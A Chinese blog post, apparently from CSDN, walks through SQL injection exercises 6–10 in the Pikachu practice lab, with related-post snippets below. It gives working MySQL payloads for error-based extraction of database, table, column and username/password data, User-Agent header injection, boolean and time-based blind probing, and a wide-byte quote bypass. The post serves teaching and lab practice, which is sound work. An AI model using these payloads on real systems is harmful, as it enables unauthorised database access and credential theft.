PIKACHU-SQL注入(6-10)

最新推荐文章于 2025-05-05 06:01:26 发布
最新推荐文章于 2025-05-05 06:01:26 发布
阅读量112 收藏
点赞数
分类专栏: pikachu 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/koala_king/article/details/129316952
版权
本文详细介绍了PIKACHU平台上的SQL注入漏洞,包括DELETE型注入、HTTP头注入、布尔型盲注、时间型盲注和宽字节注入。通过实例展示了如何利用这些注入技术获取数据库信息,如爆库、爆表、爆列及爆内容。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

6-delete注入

delete型注入相关的sql语句大概是个 DELETE FROM 表名称 WHERE 列名称 = 值 的形式。
先留个言,再删个除,burpsuite抓个包
在这里插入图片描述1、爆库 payload:http://127.0.0.1/pikachu/vul/sqli/sqli_del.php?id=58 or updatexml(1,concat(0x7e,(select database()),0x7e),1)
在这里插入图片描述2、爆表 payload:http://127.0.0.1/pikachu/vul/sqli/sqli_del.php?id=58 or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1)
在这里插入图片描述

3、爆列 payload:http://127.0.0.1/pikachu/vul/sqli/sqli_del.php?id=58 or updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’),1,31),0x7e),1)
在这里插入图片描述

4、爆内容 payload:http://127.0.0.1/pikachu/vul/sqli/sqli_del.php?id=58 or updatexml(1,concat(0x7e,substr((select group_concat(concat(username,‘^’,password)) from users),1,31),0x7e),1)

在这里插入图片描述

7-http头注入

用户名admin,密码123456登录,并用burpsuite抓包
在这里插入图片描述登录进去之后有回显http request报文头
在这里插入图片描述根据业务逻辑和上图网页回显分析,这里如果有sql语句的话,比较大可能是insert或者update语句,注入点可能在User-agent或者Accept头。

1、把 User-Agent 改为一个单引号,发包看看后台处理的结果,发现直接报了 SQL 语法错误
在这里插入图片描述

在这里插入图片描述这说明存在 SQL 注入漏洞,后台可能会 insert 到数据库中,这个 payload 跟前面的 insert 实验的是一样的
useragent注入:1’ or updatexml(1, concat(0x7e, database()), 0) or ’
在这里插入图片描述在这里插入图片描述我们这时候就能取得数据库名,后面的操作就是一样的了

8-基于boolian的盲注

1、找闭合
http://127.0.0.1/pikachu/vul/sqli/sqli_blind_b.php?name=lili’&submit=查询
用户名后面加一个单引号,返回username不存在
在这里插入图片描述http://127.0.0.1/pikachu/vul/sqli/sqli_blind_b.php?name=lili’‘&submit=查询
加两个单引号,也返回username不存在
在这里插入图片描述http://127.0.0.1/pikachu/vul/sqli/sqli_blind_b.php?name=lili’%23&submit=查询
但是加一个单引号在加一个注释符(%23就是#),返回正常结果。所以闭合是单引号。
在这里插入图片描述下面就是爆库,爆表,爆列,爆数据的步骤了

9-基于时间的盲注

先输入个正确的用户名,返回“i don’t care who you are!”
在这里插入图片描述再输入个错误的用户名,返回还是“i don’t care who you are!”
在这里插入图片描述参数正确和错误都返回一样的结果,就不能用布尔盲注了,试试时间盲注。
时间盲注的原理是构造逻辑语句,为真时执行sleep操作(表现为回包延时),为假时不执行。

http://127.0.0.1/pikachu/vul/sqli/sqli_blind_t.php?name=lili’ and if(1=1,sleep(2),1)%23&submit=%E6%9F%A5%E8%AF%A2
在这里插入图片描述看到上面的结果说明我们注入成功了。

10-宽字节注入,wide byte注入

在这里插入图片描述构建pyload:1%df’ or 1=1#
在这里插入图片描述其中%df’在gbk编码中会变成“運”,于是就变成了:1運’ or 1=1#,这样就凑成了单引号的闭合,后面也变成了永真式,所以就可以回显出整个表的信息。
在这里插入图片描述后续我们在尝试闭合成功后,后面也可以使用union联合查询来进行爆库爆表。

pikachu靶场-SQL-Inject
braty_的博客
02-23 1558
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
pikachu-sql注入
Resets_的博客
04-01 672
pikachu sql数字型注入,字符型注入
pikachu-SQL注入
qq_43660551的博客
05-11 2076
发现kobe’ and if((substr(database(),1,1))=‘p’,sleep(5),null)#时,延迟了,就这样慢慢尝试,或者拿bp弄字典跑跑啥的。用load_file()之前务必先看secure_file_priv=“”。看看数据库名的长度:name=kobe’ and length(database())>=7#,这里需要url编码,即:name=kobe’+and+length(database())>%3d7%23&submit=%E6%9F%A5%E8%AF%A2。
Pikachu靶场-SQL注入
Ee_CN的博客
09-20 1743
语法:User-Agent: 1' and updatexml(1,concat(2,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='pikachu')),3) or ' 1=1。
pikachu靶机-sql注入
C-HOWE的博客
01-20 1006
本篇文章旨在为网络安全渗透测试靶机复现学习(内容学习中,仅供参考)。通过阅读本文,读者将能够对渗透pikachu靶场SQL注入模块有一定的了解。
Pikachu-Sql Inject-数字型注入(GET)
guanrongl的专栏
10-03 624
测试。
pikachu-SQL注入漏洞
cnmeimei的博客
02-02 1031
一、SQL Inject 漏洞原理概述 1.1 什么是数据库注入漏洞 数据库注入漏洞,主要是开发人员在构建代码的时候,没有对用户输入的值的边界进行安全的考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。 1.2 SQL Inject漏洞的攻击流程 (1)第一步:注入点检测 自动方式:使用web漏洞扫描工具,自动进行注入点发现 手动方式:手工构造SQL Inject测试语句进行注入点发现 (2)第二步:信...
Pikachu-----Sql Inject(SQL注入
m0_65712192的博客
12-29 4314
Pikachu-----Sql Inject(SQL注入
Pikachu---SQL注入
从不专注的人的博客
07-05 2492
概述 什么是SQL注入漏洞 注入SQLi)是一种注入攻击,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。 SQL注入漏洞可能会影响使用SQL数据库(如MySQL,Oracle,SQL Server或其他)的任何网站或Web应用程序。犯罪分子可能会利用它来未经授
Pikachu-Sql-Inject - 基于时间的盲注
guanrongl的专栏
10-04 668
mysql 里函数sleep() 是延时的意思,sleep(10)就是数据库延时10 秒返回内容。mysql 延时注入用到的函数sleep() 、if()、substring()、select if(2>1,sleep(10),0) 2>1 这个部分就是你注入要构造的SQL 语句。就是前端的基于time 的盲注,什么错误信息都看不到,但是还可以通过特定的输入,判断后台的执行时间,从而确定注入。构造payload;如果数据库长度大于1 ,延时五秒返回;根据这个条件,可以逐个爆破表;
Pikachu-Sql Inject-数字型注入(POST)
guanrongl的专栏
10-03 904
注意:若是数据显示只显示一行,将id=-1, 此处 id 的值必须是一个在数据库中 id 字段不存在的值,否则联合查询第一条语句的查询结 果将占据显示位,需要的第二条查询语句的查询结果就不能正常显示到浏览器中。3、用 and ‘1’='1 和 and ‘1’=‘2来判断,1’ and ‘1’ = ‘1,页面运行正常,而1’ and ‘1’ = '2,页面运行错误,则说明此 Sql 注入为字符型注入。1、用减法判断:利用id=2-1 如果返回的是id=1的结果,则是数字注入,否则是字符注入
网络安全 - 综合靶场 - PIKACHU 源码包 - pikachu-master.zip
09-22
- **多漏洞场景**:包括但不限于 XSS(跨站脚本攻击)、SQL 注入、CSRF(跨站请求伪造)、文件上传漏洞、文件包含漏洞、命令执行漏洞等。 - **实战操作**:提供了一个真实的操作环境,让用户可以通过实际操作来理解...
pikachu-master.zip
06-25
Pikachu靶场中,你可以学习如何识别SQL注入漏洞,以及使用各种技巧防止此类攻击。 2. XSS(跨站脚本):这种漏洞允许攻击者在用户浏览器上执行恶意脚本,可能导致个人信息被窃取或网站被劫持。靶场会教你如何防御...
pikachu靶场SQL注入.docx
09-13
"Pikachu靶场SQL注入" Pikachu靶场SQL注入是针对Web应用程序的一种攻击手段,通过对Web应用程序的输入参数进行tampering,来达到访问数据库的目的。下面是Pikachu靶场SQL注入的详细知识点: 一、数字型注入(POST...
PostgteSQL for Everybody基础部分笔记
weixin_43416590的博客
05-02 964
笔记分享内容参考密歇根大学,在B站等也有相关视频分享。我分享的笔记内容也主要参考教程,但是我仅仅学习了基础部分,原课程内容更加丰富,但是我后来,原课程的主要内容是包括了以下多个方面:1、PostgreSQL 中的数据库设计和基础 SQL:利用和命令对 PostgreSQL 数据库中的表格执行。
SQL ROUND() 函数详解
csbysj2020
05-03 337
ROUND()函数是SQL语言中一个非常实用的数学函数,可以帮助我们在需要精确数值的场景中实现四舍五入。通过对ROUND()函数的理解和应用,可以更有效地处理数据,并提高SQL查询的性能。在本文中,我们详细介绍了ROUND()函数的基本用法、特殊情况和实际应用。通过这些示例,你将更好地理解如何在SQL中运用ROUND()函数,从而在数据分析和财务计算等领域发挥其作用。SQL ROUND()函数详解。
SQL Server临时表与视图深度对比
xiaoyu❅的博客
05-01 1800
临时表与视图如同SQL Server的“瑞士军刀”与“设计蓝图”,各有其不可替代的价值。数据生命周期:短期存储用临时表,长期逻辑用视图性能需求:高频访问的复杂查询考虑索引视图维护成本:视图需随业务变化持续优化建议开发过程中:使用对比不同方案监控TempDB空间使用(临时表滥用常见问题)为复杂视图添加提高稳定性附录官方文档:临时表与表变量:查看临时表空间占用:分析索引视图碎片。
PostgreSQL 运算符
最新发布
csbysj2020
05-05 206
本文介绍了 PostgreSQL 中常用的运算符,包括算术运算符、比较运算符、逻辑运算符和特殊运算符。通过掌握这些运算符,您可以更加灵活地操作 PostgreSQL 数据库,提高数据库操作效率。希望本文对您有所帮助。
202553-sql
yudiipp的博客
05-03 524
很容易可以想到 delete from person where id in (一坨)也是窗口函数分组排序 但是这个题就比较麻烦 需要考虑空结果集输出null。绕了个弯子 让你写删除语句本质还是写查询语句。把两列数据并成一列 然后窗口函数分组排序。理解就是加好友是相互的!题意就是删除删除重复的邮箱。
Pikachu靶场-SQL注入寻找注入类型
01-01
### Pikachu靶场中的SQL注入类型教程 #### 数字型SQL注入 当应用程序未正确过滤用户输入且该输入被用于构建SQL查询的一部分时,可能会发生数字型SQL注入。如果参数是整数形式,则攻击者可以尝试通过改变这个数值来观察应用行为的变化从而判断是否存在漏洞[^2]。 对于Pikachu靶场而言,在某些情况下,向URL或表单提交的数据中附加特殊字符(如`'`),会触发数据库错误提示,这表明可能存在SQL注入风险[^3]。 ```sql ?id=1 AND 1=1 -- 正常显示页面内容 ?id=1 AND 1=2 -- 页面返回异常或者空白页 ``` #### 字符型SQL注入 字符型SQL注入通常发生在字符串类型的参数上。在这种场景下,可以通过在合法数据之后追加恶意构造的SQL片段来进行测试。例如: ```sql username=admin' OR '1'='1 password=a' OR 'a'='a ``` 这些命令利用了逻辑运算符OR使得条件永远成立,进而绕过身份验证机制[^1]。 #### 联合查询注入 为了进一步探索数据库结构,即所谓的“爆库”,可以采用UNION SELECT语句组合两个SELECT查询的结果集。此方法适用于已知目标站点存在可利用的SQL注入点,并希望从中提取额外的信息的情况。比如获取其他表格的名字、列名等敏感资料。 ```sql ?search=test'+union+select+null,table_name,null+from+information_schema.tables--+HTTP/1.1 Host: example.com ``` 上述例子展示了如何从MySQL内置的信息模式(information_schema)读取有关现有表的信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值